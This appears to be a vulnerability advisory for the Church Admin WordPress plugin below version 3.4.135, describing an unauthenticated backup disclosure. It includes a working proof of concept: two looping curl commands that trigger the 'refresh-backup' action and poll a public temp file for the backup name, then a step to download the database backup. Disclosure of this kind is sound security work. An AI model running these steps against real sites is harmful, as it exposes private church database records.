Church Admin < 3.4.135 - Unauthenticated Plugin's Backup Disclosure

2022-03-0700:00:00

cydave

church admin

unauthenticated

plugin

backup disclosure

terminal

curl

fetch

filename

download

exploit

EPSS

0.001

Percentile

39.5%

JSON

The plugin does not have authorisation and CSRF in some of its action as well as requested files, allowing unauthenticated attackers to repeatedly request the “refresh-backup” action, and simultaneously keep requesting a publicly accessible temporary file generated by the plugin in order to disclose the final backup filename, which can then be fetched by the attacker to download the backup of the plugin’s DB data

1. In one terminal, continuously fetch from http://127.0.0.1:8080/?action=refresh-backup:

while true; do curl -s 'http://127.0.0.1:8080/?action=refresh-backup' >/dev/null; done

2. In a second terminal, continuously fetch from /wp-content/uploads/church-admin-cache/temp.sql

while true; do curl -s http://127.0.0.1:8080/wp-content/uploads/church-admin-cache/temp.sql | grep '\.sql\.gz'; done

3. After a while, the backup filename should be found by the curl | grep
   command (second terminal), once found, abort the command in terminal one first,
   then the one in the second terminal - use the last output of the second terminal as the filename (<md5-hash>.sql.gz).

4. Download the backup by accessing it via http://127.0.0.1:8080/wp-content/uploads/church-admin-cache/<extracted-md5-hash>.sql.gz

EPSS

0.001

Percentile

39.5%

JSON

Related for WPEX-ID:B2C7C1E8-D72C-4B1E-B5CB-DC2A6538965D